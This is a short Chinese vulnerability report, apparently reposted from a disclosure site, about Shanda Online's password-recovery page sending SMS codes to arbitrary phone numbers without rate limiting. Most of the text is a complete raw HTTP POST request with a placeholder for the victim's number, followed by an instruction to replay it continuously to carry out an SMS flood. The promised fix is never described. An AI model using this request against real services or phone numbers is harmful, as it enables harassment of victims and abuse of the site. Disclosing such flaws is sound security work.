盛大网络短信ddos攻击漏洞及修复漏洞预警 -电脑资料

简要描述：

盛大在线存在短信ddos攻击漏洞

详细说明：

盛大在线忘记密码处会向手机发送验证码，URL：

http://pwd.sdo.com/ptinfo/safecenter/getpwd/ChgPwdStepOldPwd.aspx?showbindmobile=1

手机号码可任意控制，并且没有进行数量控制，可进行短信DDOS攻击

漏洞证明：

POST /ptinfo/safecenter/Controls/IPwd.aspx HTTP/1.1

Host: pwd.sdo.com

User-Agent: Mozilla/5.0 (X11; Linux x8

Accept: */*

Accept-Language: zh-cn,zh;q=0.5

Accept-Encoding: gzip, deflate

Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7

Proxy-Connection: keep-alive

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Referer: http://pwd.sdo.com/ptinfo/safecenter/getpwd/ChgPwdStepOldPwd.aspx?showbindmobile=1

Content-Length: 444 www.2cto.com

Cookie: ASP.NET_SessionId=rfuowv55tuqwmgifvidao255; b_t_s=t115065872973xs; sdo_beacon_id=58.215.45.150.1315065873297.3; CaptchaSeq=kgWVVswyQC6C55eS

Pragma: no-cache

Cache-Control: no-cache

at=GetPwdMobileSendCode&source=S&pt=&ekey=&ekey1=&ekey2=&ekey3=&ekey4=&ecard1=&ecard2=&ecard3=&phone=[替换为目标手机号]&code=&imgcode=&email=&mobile=&mobilecode=&emailcode=®name=®idcard=®email=®mobile=®tel=®birthday=®question1=®answer1=®question2=®answer2=&adultname=&adultidcard=&orgpwd=&signarea=&firstgame=&signtime=&stolentime=&hispwd=&oldpwd=&newpwd=&newpwd2=&days=&selectunbind=&uploadpic=&custompwd=&a=&randomcode=

不断回放以上数据包，可进行DDOS攻击

作者mog